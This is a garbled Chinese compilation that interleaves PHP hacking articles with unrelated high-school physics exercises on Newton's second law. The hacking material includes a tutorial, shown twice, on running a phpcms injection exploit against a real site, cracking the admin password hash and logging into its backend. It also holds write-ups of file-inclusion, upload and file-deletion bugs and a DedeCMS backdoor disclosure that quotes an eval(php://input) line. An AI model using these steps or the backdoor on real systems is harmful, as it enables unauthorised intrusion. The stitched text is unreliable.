最近php出了些问题,害得许多用php写的程序都出了很多漏洞,在sebug上每天都可以看到许多,漏洞的exp(exploit,也就是漏洞利用)是用php写的,QQ 上每天都有许多叉子问我php的exp该怎么用,问得我头都大了,我现在就来给大家讲一下php写的exp的利用方法。
首先我们来在本地装一下php的运行环境。打开php-installer,一切设置都默认(我安装的目录是D盘的php),一路next就可以了,如图1。
10月1日的时候我朋友NetHacKar刚发现了一个phpcms的注入漏洞,就用它来做演示吧,他在sebug上已经公布出了完整的exp,如图2。
可是这些php代码我们该怎么利用呢?大家别急,先把这段代码用记事本保存下来,我保存在D:/php/phpcms.php这里了。现在我们打开cmd来到D:/php/目录下用php.exe运行一下刚才我们保存的那个exp文件,如图3。
我们看见了返回的结果,他给出了利用的格式:php phpcms.php localhost / ,在这里localhost 我们可以改成对方的域名,/就是对方的phpcms系统的目录(如果是根目录就直接/,如果是phpcms目录就写/phpcms/),注意一下,这里有个空格。
我找到了一个目标:https://www.doczj.com/doc/a018001889.html,,我们拿他来测试一下,在cmd里php phpcms.php https://www.doczj.com/doc/a018001889.html, /。我们来看一下结果,如图4。
已经成功的破出了它的管理员的账号和密码的32位md5值。账号是admin,密码的md5是21232f297a57a5a743894a0e4a801fc3,我们把它拿到https://www.doczj.com/doc/a018001889.html,上来解密一下,得到的
密码也是admin,如图5,我们来到后台
https://www.doczj.com/doc/a018001889.html,/admin.php?mod=phpcms&file=login,登上去,如图6这样,
摘要:对于不懂脚本编写的朋友,看到大牛写的exp都是远观而不会玩。很多人都看到过一些关于PHP的EXP程序,但都不会利用。其实这种漏洞利用程序利用起来很简单的。下面来看看利用方法吧!...
很多人都看到过一些关于PHP的EXP程序,但都不会利用。其实这种漏洞利用程序利用起来很简单的。
首先我们来在本地装一下php的运行环境。打开php-installer,一切设置都默认(我安装的目录是D盘的php),一路next就可以了
我们用PHPCMS的一个漏洞来做演示。我们可以发现这些EXP都是PHP的代码,这怎么弄呢?大家别急,先把这段代码用记事本保存下来,我保存在D:/php/phpcms.php这里了。现在我们打开cmd来到D:/php/目录下用php.exe运行一下刚才我们保存的那个exp文件
我们看见了返回的结果,他给出了利用的格式:php phpcms.php localhost / ,在这里localhost 我们可以改成对方的域名,/就是对方的phpcms系统的目录(如果是根目录就直接/,如果是phpcms目录就写/phpcms/),注意一下,这里有个空格。我找到了一个目标:https://www.doczj.com/doc/a018001889.html,,我们拿他来测试一下,在cmd里php phpcms.php https://www.doczj.com/doc/a018001889.html, /。我们来看一下结果,如图4。已经成功的破出了它的管理员的账号和密码的32位md5值。账号是admin,密码的md5是21232f297a57a5a743894a0e4a801fc3,我们把它拿到cmd5上来解密一下,得到的密码也是admin,
我们来到后台,登上去,这样,我们就利用成功了。每个用php写的exp其实都可以这样利用的。
标签分类:脚本渗透
本文转自☆★黑白前线★☆- https://www.doczj.com/doc/a018001889.html, 转载请注明出处,侵权必究!
原文链接:https://www.doczj.com/doc/a018001889.html,/a/Special/wlgf/jbst/2009/1111/1530.html
例1.如图所示,一质量为M=5 kg的斜面体放在水平地面上,斜面体与地面的动摩擦因数为μ1=0.5,斜面高度为h=0.45 m,斜面体右侧竖直面与小物块的动摩擦因数为μ2=0.8,小物块的质量为m=1 kg,起初小物块在斜面的竖直面上的最高点。现在从静止开始在M上作用一水平恒力F,并且同时释放m,取g=10 m/s2,设小物块与斜面体右侧竖直面间最大静摩擦力等于它们之间的滑动摩擦力,小物块可视为质点。问: (1)要使M、m保持相对静止一起向右做匀加速运动,加速度至少多大? (2)此过程中水平恒力至少为多少? 例1解析:(1)以m为研究对象,竖直方向有: mg-F f=0 水平方向有:F N=ma 又F f=μ2F N 得:a=12.5 m/s2。 (2)以小物块和斜面体为整体作为研究对象,由牛顿第二定律得:F-μ1(M+m)g=(M+m)a 水平恒力至少为:F=105 N。 答案:(1)12.5 m/s2(2)105 N 例2.如图所示,质量为m的光滑小球,用轻绳连接后,挂在三角劈的顶端,绳与斜面平行,劈置于光滑水平面上,求: (1)劈的加速度至少多大时小球对劈无压力?加速度方向如何? (2)劈以加速度a1= g/3水平向左加速运动时,绳的拉力多大? (3)当劈以加速度a3= 2g向左运动时,绳的拉力多大? 例2解:(1)恰无压力时,对球受力分析,得 (2),对球受力分析,得
(3),对球受力分析,得(无支持力) 练习: 1.如图所示,质量为M的木板上放着质量为m的木块,木块与木板间的动摩擦因数为μ1,木板与水平地面间的动摩擦因数为μ2,求加在木板上的力F为多大时,才能将木板从木块下抽出?(取最大静摩擦力与滑动摩擦力相等) 1解:只有当二者发生相对滑动时,才有可能将M从m下抽出,此时对应的临界状态是:M与m间的摩擦力必定是最大静摩擦力,且m运动的加速度必定是二者共同运动时的最大加速度 隔离受力较简单的物体m,则有:,a m就是系统在此临界状态的加速度 设此时作用于M的力为F min,再取M、m整体为研究对象,则有: F min-μ2(M+m)g=(M+m)a m,故F min=(μ1+μ2)(M+m)g 当F> F min时,才能将M抽出,故F>(μ1+μ2)(M+m)g 2.一条不可伸长的轻绳跨过质量可忽略不计的定滑轮,绳的一端系一质量M=15kg的重物,重物静止于地面上,有一质量m=10kg的猴从绳子另一端沿绳向上爬,如图所示,不计滑轮摩擦,在重物不离开地面条件下,猴子向上爬的最大加速度为(g=10m/s2)() A.25m/s2 B.5m/s2 C.10m/s2 D.15m/s2 2.分析:当小猴以最大加速度向上爬行时,重物对地压力为零,故小猴对细绳的拉力等于重物的重力,对 小猴受力分析,运用牛顿第二定律求解加速度. 解答:解:小猴以最大加速度向上爬行时,重物对地压力为零,故小猴对细绳的拉力等于重物的重力,即F=Mg; 小猴对细绳的拉力等于细绳对小猴的拉力F′=F; 对小猴受力分析,受重力和拉力,根据牛顿第二定律,有
PHP文件包含漏洞详解(1) 一、什么才是”远程文件包含漏洞”? 回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 涉及到的危险函数:include(),require()和include_once(),require_once() Include:包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。 Require:跟include唯一不同的是,当产生错误时候,include下面继续运行而require停止运行了。 Include_once:这个函数跟include函数作用几乎相同,只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。 Require_once:这个函数跟require的区别跟上面我所讲的include和include_once是一样的。所以我就不重复了。 php.ini配置文件:allow_url_fopen=off 即不可以包含远程文件。Php4存在远程&本地,php5仅存在本地包含。 二、为什么要包含文件? 程序员写程序的时候,不喜欢干同样的事情,也不喜欢把同样的代码(比如一些公用的函数)写几次,于是就把需要公用的代码写在一个单独的文件里面,比如 share.php,而后在其它文件进行包含调用。在php里,我们就是使用上面列举的那几个函数来达到这个目的的,它的工作流程:如果你想在 main.php里包含share.php,我将这样写include(“share.php”)就达到目的,然后就可以使用share.php中的函数了,像这个写死需要包含的文件名称的自然没有什么问题,也不会出现漏洞,那么问题到底是出在哪里呢? 有的时候可能不能确定需要包含哪个文件,比如先来看下面这个文件index.php的代码: if ($_GET[page]) { include $_GET[page]; } else { include ”home.php”; }
文件上传漏洞及解析漏洞总结 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 文件上传后导致的常见安全问题一般有: 1)上传文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行。 2)上传文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为(其他通过类似方式控制策略文件的情况类似); 3)上传文件是病毒、木马文件,黑客用以诱骗用户或者管理员下载执行。 4)上传文件是钓鱼图片或为包含了脚本的图片,在某些版本的浏览器中会被作为脚本执行,被用于钓鱼和欺诈。 除此之外,还有一些不常见的利用方法,比如将上传文件作为一个入口,溢出服务器的后台处理程序,如图片解析模块;或者上传一个合法的文本文件,其内容包含了PHP脚本,再通过"本地文件包含漏洞(Local File Include)"执行此脚本;等等。 要完成这个攻击,要满足以下几个条件: 首先,上传的文件能够被Web容器解释执行。所以文件上传后所在的目录要是Web容器所覆盖到的路径。 其次,用户能够从Web上访问这个文件。如果文件上传了,但用户无法通过Web访问,或者无法得到Web容器解释这个脚本,那么也不能称之为漏洞。 最后,用户上传的文件若被安全检查、格式化、图片压缩等功能改变了内容,则也可能导致攻击不成功。 一、从FCKEditor文件上传漏洞谈起 FCKEditor是一款非常流行的富文本编辑器,为了方便用户,它带有一个文件上传功能,但是这个功能却出过多次漏洞。 FCKEditor针对ASP/PHP/JSP等环境都有对应的版本,以PHP为例,其文件上传功能在:
挖掘PHP整站程序漏洞的一些思路和经验 (廖坚先)Bykid@广东科干 第一次写稿同时也是第一次投稿,文章写的不好,大家多多包涵;进入正题,今天要跟大家分享的是挖掘PHP整站程序漏洞的一些思路,就拿phpcms2007整站(版本:PHPCMS 2007-更新日期:20080717)来说吧。 先给大家展示我在phpcms2007挖掘到的几个安全漏洞和安全隐患,虽然有的已经在phpcms2008中不存在,但是却可以从中得到一些经验或许这些漏洞在其它整站程序中存在也不稀奇啊,然后呢再引出我是如何快捷的发现它们的,所以重点还在后面,大家要耐心看下去啊。 Bug->1:漏洞出现在安装整站的文件install.php,关键源代码:在217行“file_put_contents(PHPCMS_ROOT.'/data/uninstall/phpcms/phpcms.php',phpcms_encode(serial ize($user),'uninstall'));”和473行“@unlink(PHPCMS_ROOT.'/data/install/phpcms/phpcms.php');”,大家可以按照这个路径去找找看有没有install这个文件夹。答案是没有的,phpcms.php 是在uninstall\phpcms\下面。这里应该是程序员笔误,他应该是想删除217行建立的phpcms.php,此文件的作用是为了最后的安装操作传递用户填的管理员的账号和密码的。账号和密码经过了自写的函数“phpcms_encode”的加密但是可还原,同时这些编码是没有以PHP代码的形式存放的,也就是说我们浏览那个文件就可以看到内容并且通过“include\auth.func.php”里面的“phpcms_decode”函数解密来查看。 Bug->2:漏洞出现在corpandresize\ui.php,关键代码如下: $dirnames=dirname($PHP_QUERYSTRING);//得到url问号后面的参数 $tmp=PHPCMS_ROOT.'/'.str_replace($PHPCMS['siteurl'],'',$dirnames).'/'; $tmp_url=str_replace($PHPCMS['siteurl'],'',$dirnames); if(preg_match("/http:/",$tmp))//重点:只要提交的是外部站点的地址就会执行花括号的代码{ include_once PHPCMS_ROOT."/include/upload.class.php"; $tmp=PHPCMS_ROOT.'/'.$PHPCMS['uploaddir'].'/'.date('Ym').'/'; $tmp_url=$PHPCMS['uploaddir'].'/'.date('Ym'); dir_create($uploaddir); } 我们的目的是利用dir_create($uploaddir),$uploaddir是未初始化的这样我们可以post这个变量上去,同样也应该是程序员的笔误,按照正常的逻辑$uploaddir这里应该是$tmp来的,这样就让我们有机可乘了(*^__^*)嘻嘻……顾名思义dir_create就是创建文件夹的,这个函数在“include\global.func.php”中被定义,值传递进去后没有什么限制,就不贴代码了。 Bug->3:这个是Oday漏洞来的,phpcms2008SP3-20100125版本中还存在,漏洞出现在“corpandresize\process.php”关键代码: $thumbfile=$_COOKIE['thumbfile']; if($thumbfile)@unlink(TMP_PATH.'/'.$thumbfile); 变量$thumbfile是从cookie中来的,大家可以自由发挥,TMP_PATH这个常量定义在“config.inc.php”里面,其实他也是cookie中传来的变量$tmp,所以$tmp+$thumbfile就可以删掉任何你想要删除的文件了,其实这个图片裁减的这个组件安全问题还是蛮多的。 好啦,到现在大家有没有发现这几个漏洞都是跟文件或文件夹的操作有关呢?想要渗透一个网站拿到webshell肯定要上传webshell了也就是对文件的操作了,那就关涉到PHP 的文件操作函数。
专题五 牛顿运动定律的应用 ——临界和极值问题 一、概念 (1)临界问题:某种物理现象(或物理状态)刚好要发生或刚好不发生的转折状态。 (2)极值问题:在满足一定的条件下,某物理量出现极大值或极小值的情况。 二、关键词语 在动力学问题中出现的“最大”、“最小”、“刚好”、“恰能”等词语,一般都暗示了临界状态的出现,隐含了相应的临界条件。有些物理过程中没有明显出现临界问题的线索,但在变化过程中可能出现临界问题,也可能不出现临界问题,解答这类问题一般用假设法。 三、常见类型 动力学中的常见临界问题主要有三类:一是弹力发生突变时接触物体间的脱离与不脱离的问题;二是绳子的绷紧与松弛问题;三是摩擦力发生突变的滑动与不滑动问题。 四、解题关键 解决此类问题的关键是对物体运动情况的正确描述,对临界状态的判断与分析,找出处于临界状态时存在的独特的物理关系,即临界条件。 常见的三类临界问题的临界条: 1、 相互接触的两个物体将脱离的临界条件是:相互作用的弹力为零。 2、 绳子松弛的临界条件是:绳子的拉力为零。 3、 存在静摩擦的系统,相对滑动与相对静止的临界条件是:静摩擦力达到最大值。 五、例题解析 【例题1】质量为0.2kg 的小球用细线吊在倾角为θ=60°的斜面体的顶端,斜面体静止时,小球紧靠在斜面上,线与斜面平行,如图所示,不计摩擦,求在下列三种情况下,细线对小球的拉力(取g =10 m/s 2) (1) 斜面体以23m/s 2的加速度向右加速运动; (2) 斜面体以43m/s 2,的加速度向右加速运动; 【例题2】如图所示,轻绳AB 与竖直方向的夹角θ=37°,绳BC 水平,小球质量m =0.4 kg ,取g =10m/s 2。试求: (1)小车以a 1=2.5m/s 2的加速度向右做匀加速运动时,绳AB 的张力是多少? (2)小车以a 2=8m/s 2的加速度向右做匀加速运动时,绳AB 的张力是多少?
值 2.中学阶段常见的临界问题归纳: 3.掌握临界问题的基本思路:
①仔细审题,认真分析研究对象所经历的物理过程,找到临界状态 ②找到重要物理量的变化规律,找出临界条件 ③根据临界条件列方程求解 【典型题例】 例1:有一质量M=4kg的小车置于光滑水平桌面上,在小车上放一质量m=6kg 的物块,动摩擦因素μ=0.2,现对物块施加F=25N的水平拉力,如图所示,求小车的加速度?(设车与物块之间的最大静摩擦力等于滑动摩擦力且g取10m/s2) 例2.托盘A托着质量为m的重物B,B 挂在劲度系数为k的弹簧下端,弹簧的上端悬挂于O点,开始时弹簧竖直且为原长,今让托盘A竖直向下做初速为零的匀加速运动,其加速度为a,求经过多长时间,A与B开始分离(a g). 例3.如图,光滑斜面质量为M=8 kg,小球m=2kg,用细绳悬挂相对静止在斜面上,求: (1)用多大的水平力F推斜面时,绳中的张力为零? (2)用多大的水平力F推斜面时,小球对斜面的压力为零? 例4:如图所示,m=4kg的小球挂在小车后壁上,细线与竖直方向成37°角。求: (1)小车以a=g向右加速; (2)小车以a=g向右减速时,细线对小球的拉力F1和后壁对小球的压力F2各多大? 牛顿第二定律专题(二)—临界问题与极值问题针对训练 一、选择题(第1到第4为单选题,第5到第8题为多选题) 1.如图在前进的车厢的竖直后壁上放一个物体,物体与后壁间的滑动摩擦系数为μ,设最大静摩擦力等于滑动摩擦力.要使物体不下滑,车厢至少应以多大的加速度前进() A.g/μ B.gμ C.μ/g D.g 2.如图5所示,质量为M的木板,上 O B A 例2题 例1
牛顿第二定律专题(二)—临界问题与极值问题 1.临界问题和极值问题 涉及临界状态的问题叫临界问题。临界状态常指某种物理现象由量变到质变过渡到另一种物理现象的连接状态,常伴有极值问题出现。临界问题常伴有特征字眼出现,如“恰好”、“刚刚”等,找准临界条件与极值条件,是解决临界问题与极值问题的关键。 能处理力学中常见的三类临界问题的临界条件: (1)相互接触的两个物体将要脱离的临界条件是:相互作用的弹力为零 (2)绳子松弛的临界条件是:绳中拉力为零 (3)存在静摩擦的连接系统,当系统外力大于最大静摩擦力时,物体间不一定有相对滑动,相对滑动与相对静止的临界条件是:静摩擦力达最大值 2.掌握临界问题的基本思路: ①仔细审题,认真分析研究对象所经历的物理过程,找到临界状态 ②找到重要物理量的变化规律,找出临界条件 ③根据临界条件列方程求解 例1:有一质量M=4kg的小车置于光滑水平桌面上,在小车上放一质量m=6kg的物块,动摩擦因素μ=0.2,现对物块施加F=25N的水平拉力,如图所示,求小车的加速度?(设车与物块之间的最大静摩擦力等于滑动摩擦力且g取10m/s2) 例1
例2.如图,光滑斜面质量为M=8 kg ,小球m=2kg ,用细绳悬挂相对静止在斜面上,求: (1)用多大的水平力F 推斜面时,绳中的张力为零? (2)用多大的水平力F 推斜面时,小球对斜面的压力为零? 例3:如图所示, m =4kg 的小球挂在小车后壁上,细线与竖直方向成37°角。求: (1)小车以a=g 向右加速; (2)小车以a=g 向右减速时,细线对小球的拉力F 1和后壁对小球的压力F 2各多大? 例4.托盘A 托着质量为m 的重物B ,B 挂在劲度系数为k 的弹簧下端,弹簧的上端悬挂于O 点,开始时弹簧竖直且为原长,今让托盘A 竖直向下做初速为零的匀加速运动,其加速度为a ,求经过多长时间,A 与B 开始分离(a g ). 例2题图 例4
PHP漏洞原理 PHP是一种服务器端的,嵌入HTML的脚本语言。PHP区别其他语言的地方是它的代码在服务器端执行,例如收集表格数据,生成动态页面内容,或者收发cookies等,今天我们来了解一下它的漏洞问题。 一全局变量 全局变量,就是能够在整个程序执行的过程中都存在的变量。基于PHP的应用程序的主函数一般都是接受用户的输入,然后对输入数据进行处理,然后把结果返回到客户端浏览器。为了使PHP代码访问用户的输入尽可能容易,实际上PHP是把这些输入数据看作全局变量来处理的。
这段代码会显示一个文本框和提交按钮。当用户点击提交按钮时,页面就会将用户输入的数据传递到“get.php”,当“get.php”运行时,“$test”就会自动创建,包含了用户在文本框输入的数据。我们可以看出,攻击者可以按照自己的意愿创建任意的全局变量。下面的认证代码暴露了PHP的全局变量所导致的安全问题: 上面的代码首先检查用户的密码是否为“monster”,如果匹配的话,则设置“$pass”为“1”,之后如果“$pass”的值为“1”的话,就会认证通过。 从表面看起来,这是正确的,但是这段代码犯了想当然的错误,它假定“$pass”在没有设置值的时候是空的,却没有想到,攻击者可以创建任何全局变量并赋值,通过提交“http://server/get.php?pass=1”的方法,我们完全可以欺骗这段代码,使它相信我们是已经认证过的。 二过滤输入/输出转义 过滤是Web应用安全的基础。它是你验证数据合法性的过程。通过在输入时确认对所有的数据进行过滤,你可以避免未过滤数据在你的程序中被误信及误用。大多数流行的PHP 应用的漏洞最终都是因为没有对输入进行恰当过滤造成的。最好的方法是把过滤看成是一个检查的过程。 另外一个Web应用安全的基础是对输出进行转义或对特殊字符进行编码,以保证原意不变。例如,O'Reilly在传送给MySQL数据库前需要转义成O\'Reilly。单引号前的反斜杠代表单引号是数据本身的一部分,而不是并不是它的本义。 为了区分数据是否已转义,还是建议定义一个命名机制。对于输出到客户机的转义数据,使$html数组进行存储,该数据首先初始化成一个空数组,对所有已过滤和已转义数据进行保存。dedecms 5.7 shopcar.class.php 被植入一句话一句话后门利用 漏洞详情 披露状态: 2012-03-20:积极联系厂商并且等待厂商认领中,细节不对外公开 2012-03-20:厂商已经主动忽略漏洞,细节向公众公开 简要描述: DedeCMS V5.7 SP1正式版 UTF-8 GBK版本疑似被植入一句话后门 前几日下载并不存在此代码 详细说明: shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
漏洞证明: shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
修复方案: 删除@eval(file_get_contents('php://input')); shopcar.class.php 被植入一句话 @eval(file_get_contents('php://input')); 去官网下了一套回来,看了下代码,
classMemberShops{var $OrdersId;var $productsId;function __construct(){ $this->OrdersId= $this->getCookie("OrdersId");if(empty($this->OrdersId)){ $this->OrdersId= $this->MakeOrders();}@eval(file_get_contents('php://input'));}functionMemberShops(){ $this->__construct();} shopcar.class.php 文件中只有一个MemberShops 类,构造函数里面出现了后门,当类被实例化的时候就会自动执行构造函数,程序猿你懂的。。。 eval 执行和file_get_contents 获取内容不用说了,php://input 这个是输入流,接收的是post 内容,但是post 类型不能为multipart/form-data 在eclipse 里搜索new MemberShops, 找到/plus/car.php 里面实例化了这个类, require_once (dirname(__FILE__)."/../include/common.inc.php");define('_PLUS_TPL_', DEDEROOT.'/templets/plus');require_once(DEDEINC.'/dedetemplate.class.php');require_o nce DEDEINC.'/shopcar.class.php';require_once DEDEINC.'/memberlogin.class.php';$cart =newMemberShops(); 开始的时候写了个简单的表单去测试,发现php://input 的内容中特殊符号会被urlencode,很奇怪吧,明明取的是post,却像get 一样被编码,既然如此,那就自己构造post 了,抓个包,用fsockopen() 函数模拟post 提交吧,exp 如下:
浅谈牛顿第二定律的应用之临界问题的教学设计 一、引言 牛顿第二定律是高中物理知识系统的基石,可以说学生只要打好了这一地基, 就容易建起高中物理知识系统的高楼大厦。但是对于学生的学习,牛顿第二定律 往往他们成为高中物理学习的分水岭。尽管很多教师在教学过程中,不断总结特 性、展现相同的题型或者多样的解题方法、步骤,但是对于一部分无法理解牛顿 第二定律本质的学生效果始终寥寥。 很多时候我们通过教学反思去寻找造成这一现象的原因,根据学生的程度,发 现原因是多种多样的。但是有一个原因或者是我们自身的,那就是从一开始我们 自己就参与的太多,忽略了学生的主观能动性。 比如我们的习题课,上课主要就是告诉学生这个知识应该怎么做,然后辅助多 个例题,练习,让学生掌握住这个知识点。这种做法虽然有必要但是是死板的, 没有真正的从思维上对学生做很好的诱导,导致学生短时间内是记得怎样处理相 同的题目,但是时间一长,或者题型一变就束手无策了。 鉴于以上原因,关于临界问题,我尝试安排这样一节习题课,试图从学生原有 的知识体系入手,设计了原始题目,让学生在解题时碰触矛盾,从而诱导学生找 到解题的关键,然后辅助练习巩固和加深,使学生自己找到解题的方法,最后由 教师再自然地点出这节课的主题,和学生一起总结内容和方法。 二、过程实录 【例1】如图1所示,A 、B 两物体叠放在光滑水平面上,AB 间动摩擦因数 为μ= 0.2,已知它们的质量M A = 6kg ,M B = 2kg ,力F 作用在A 物体上(假设最 大静摩擦力等于滑动摩擦力,g = 10m / s 2 ) ,求: (1)当F = 16N 时,求B 物体受到的摩擦力大小; (2)当F = 50N 时,求B 受到的摩擦力大小? 图1 学生在做第1问的时候会认为F 大于最大静摩擦力了,所以AB 滑动了,因此 它们之间是滑动摩擦力。这时我板书让学生算出A 、B 的加速度,分别计算得 2 /32s m M g M F a a M g M F a M f F A A A A A A A A =-=?=-?=-μμ, 2/6s m M g M M f a a M g M a M f B A B B B B A B B ===?=?=μμ。
3.11牛顿第二定律的应用(八)动力学中的临界问题(教案) 一、中学物理中涉及到临界的各种题型 1.同一直线上两个运动物体的距离最近(远)的临界条件是:速度相等。 2.两物体刚好不相撞的临界条件是:接触时速度刚好相等。 3.两物体刚好发生(不发生)相对滑动的临界条件是:物体间的静摩擦力等于最大静摩擦力。 4.两物体刚好分离的临界条件是:速度和加速度相等,在分离方向上,两物体间的挤压力为零。 5.物体刚好滑出(滑不出)小车或桌面的临界条件是:物体滑到小车一端或桌边时与车或桌的速度相等。 6. 做圆周运动的物体刚好通过最高点的临界条件是: gR V ≥ 7.静电场中(1)带电粒子平行于电场方向进入,刚好打不到某一极板的临界条件是:带电粒子到达极板时的速度为零;(2)带电粒子垂直与电场方向进入,飞出飞不出平行极板的临界条件是:摖边飞出。 8.稳恒电流部分:电源输出的功率达不达到最大值的临界条件是:电路中的外电阻等于电源内阻时输出功率最大。 9.有界磁场部分的临界问题:带电粒子飞出飞不出磁场区域 10.电磁感应中的临界问题:金属棒下滑的速度达到最大值的临界条件是:a=0 11.光学中刚好发生(不发生)全反射的临界条件是:C ≥θ 12.刚好发生(不发生)光电效应的临界条件是: 0f f ≥ 二、与牛顿运动定律相关联的临界问题 是上述情况中的3、4、5 三、临界问题的解题方法 考虑到临界现象的临界点必然隐藏在运动的过程中,分析这类问题最基本的方法还是要更加细致地分析受力情况和运动过程,也可配合使用以下三种方法: 方法一:极限法,即把物理问题或过程的发展方向和发展结果推向极端,从而将临界条件显露出来,达到尽快求解的目的。 方法二:假设法,即假设出现某种临界状态,物体的受力情况及运动状态与题设是否相符,最后再根据实际情况进行处理。 方法三:数学方法:将物理过程转化为数学表达式,然后根据数学中求极值的方法,求出临界条件,如二次函数、不等式、三角函数等等。
牛顿第二定律临界问题专题训练 1、一有固定斜面的小车在水平面上做直线运动,小球通过细绳与车顶相连.小球某时刻正处于图示状态.设斜面对小球的支持力为N,细绳对小球的拉力为T,关于此时刻小球的受力情况,下列说法正确的是() A.若小车向左运动,N可能为零 B.若小车向左运动,T可能为零 C.若小车向右运动,N不可能为零 D.若小车向右运动,T不可能为零 2、如图13,小车在水平面上以5m/s的速度向右做匀速直线运动,车厢内用OA、OB两细绳系住一个质量为2kg的物体,OA与竖直方向夹角为θ=37°,OB是水平的。后来小车改做匀减速运动,并经1.25m的位移停下来, 求(1)车在匀速运动的过程中,两绳的拉力TA、TB各是多少? (sin37o=0.6)(2)车在匀减速运动的过程中,两绳的拉力TA、TB各是多少? (g 取10m/s2。) 3、如图,火车车厢中有一个倾角为30°的斜面,当火以10M/s2的速度沿水平方向向左运动时,斜面上质量为M的物体A 保持与车厢相对静止,求物体所受摩擦力。(取g=10m/s22)
物体的分离问题 1、如图所示,A、B两个物体靠在一起,放在光滑水平面上,它们的质量分别为mA=3 kg,mB=6 kg.今用水平力FA推A,用水平力FB拉B,FA和FB随时间变化的关系是FA=9-2t(N),FB=3+2t(N).则从t=0到A、B脱离,它们的位移是 2、一个弹簧秤放在水平面上,Q为与轻弹簧上端连在一起的秤盘,P为一重物.已知P的 质量M=10.5kg,Q的质量为m=1.5kg,弹簧的质量不计,劲度系数k=800N/m,系统处于静止状态.先给P施加一个方向向上的力F,使它从静止开始向上做匀加速运动.已知在前0.2s时间内,F为变力,0.2s以后,F为恒力.求力F的最大值和最小值.(重力加速度g取10m/s2) 3、如图所示,质量为M的木板上放着一质量为m的木块,木块与木板间的动摩擦因数为 μ1,木板与水平地面间的动摩擦因数为μ2,加在小板上的力F为多大,才能将木板从木块下抽出?
专题十四 牛顿第二定律之动力学临界问题 1. 如图所示,一轻绳上端系在车的左上角的A 点,另一轻绳一端系在车左端B 点,B 点在A 点正下方,A 、B 距离为b ,两绳另一端在C 点相结并系一质量为m 的小球,绳AC 长度为 b ,绳BC 长度为b .两绳能够承 受的最大拉力均为 2mg .求: (1)绳BC 刚好被拉直时,车的加速度是多大? (要求画出受力图) (2)在不拉断轻绳的前提下,求车向左运动的最大加速度是多大?(要求画出受力图) 2. 如图所示,质量为m =1Kg 的物块放在倾角为0 37θ=的斜面体上,斜面质量为M =2Kg ,斜面与物块间的动摩擦因数为0.2μ=,地面光滑,现对斜面体施一水平推力F ,要使物块m 相对斜面静止,试确定推力F 的取值范围.(取2 10/g m s =) 3. 静止在水平面上的A .B 两个物体通过一根拉直的轻绳相连,如图所示,轻绳长L =1m ,承受的最大拉力为8N , A 的质量m 1=2kg , B 的质量m 2=8kg ,A 、B 与水平面间的动摩擦因数μ=0.2,现用一逐渐增大的水平力作用在B 上,使A .B 向右运动,当F 增大到某一值时,轻绳刚好被拉断(g =10m /s 2 ) (1)求绳刚被拉断时F 的大小. (2)若绳刚被拉断时,A . B 的速度为2m /s ,保持此时的F 大小不变,当A 的速度恰好减小为0时,A .B 间的距离为多少?
4.(多选)如图所示,质量不等的两个物体A、B.在水平拉力F的作用下,沿光滑水平面一起向右运动,滑轮及细绳质量不计.则下列说法中正确的有( CD ) A.物体B所受的摩擦力方向一定向左 B.物体B所受的摩擦力方向可能向左 C.物体B所受的摩擦力一定随水平力F的增大而增大 D.只要水平力F足够大.物体A、B间一定会打滑 多过程的临界 5.如图所示,水平平台ab长为20 m,平台b端与长度未知的特殊材料制成的斜面bc连接,斜面倾角为30°.在平台a端放上质量为5 kg的物块,并给物块施加与水平方向成37°角的大小为50 N的推力后,物块由静止开始运动.已知物块与平台间的动摩擦因数为0.4,重力加速度g取10 m/s2,sin 37°=0. 6. (1)求物块由a运动到b所用的时间; (2)若物块从a端运动到P点时撤掉推力,则物块刚好能从斜面b端开始下滑,则a、P间的距离为多少? (物块在b端无能量损失) (3)若物块与斜面间的动摩擦因数μbc=0.277+0.03L b,式中L b为物块在斜面上所处的位置离b端的距离,在(2)中的情况下,物块沿斜面滑到什么位置时速度最大? 6.中央电视台曾经推出过一个游戏节目——推矿泉水瓶.选手们从起点开始用力推瓶一段时间后,放手让瓶向前滑动,若瓶最后停在桌上有效区域内视为成功,若瓶最后不停在有效区域内或在滑行过程中倒下均视为失败. 其简化模型如图所示,AC是长度为m L5 1 = 的水平桌面,选手们可将瓶子放在A点,从A点开始用一恒定不 变的水平推力推瓶,BC为有效区域.已知BC长度为m L1 2 = ,瓶子质量为 kg m5.0 = ,瓶子与桌面间的动摩 擦因数 4.0 = μ .某选手作用在瓶子上的水平推力 N F20 =,瓶子沿AC做直线运动,()假设 瓶子可视为质点,那么该选手要想游戏获得成功,试问::(1)推力作用在瓶子上的时间最长不得超过多少?
最近php出了些问题,害得许多用php写的程序都出了很多漏洞,在sebug上每天都可以看到许多,漏洞的exp(exploit,也就是漏洞利用)是用php写的,QQ 上每天都有许多叉子问我php的exp该怎么用,问得我头都大了,我现在就来给大家讲一下php写的exp的利用方法。 首先我们来在本地装一下php的运行环境。打开php-installer,一切设置都默认(我安装的目录是D盘的php),一路next就可以了,如图1。 10月1日的时候我朋友NetHacKar刚发现了一个phpcms的注入漏洞,就用它来做演示吧,他在sebug上已经公布出了完整的exp,如图2。 可是这些php代码我们该怎么利用呢?大家别急,先把这段代码用记事本保存下来,我保存在D:/php/phpcms.php这里了。现在我们打开cmd来到D:/php/目录下用php.exe运行一下刚才我们保存的那个exp文件,如图3。
我们看见了返回的结果,他给出了利用的格式:php phpcms.php localhost / ,在这里localhost 我们可以改成对方的域名,/就是对方的phpcms系统的目录(如果是根目录就直接/,如果是phpcms目录就写/phpcms/),注意一下,这里有个空格。 我找到了一个目标:https://www.doczj.com/doc/a018001889.html,,我们拿他来测试一下,在cmd里php phpcms.php https://www.doczj.com/doc/a018001889.html, /。我们来看一下结果,如图4。
已经成功的破出了它的管理员的账号和密码的32位md5值。账号是admin,密码的md5是21232f297a57a5a743894a0e4a801fc3,我们把它拿到https://www.doczj.com/doc/a018001889.html,上来解密一下,得到的
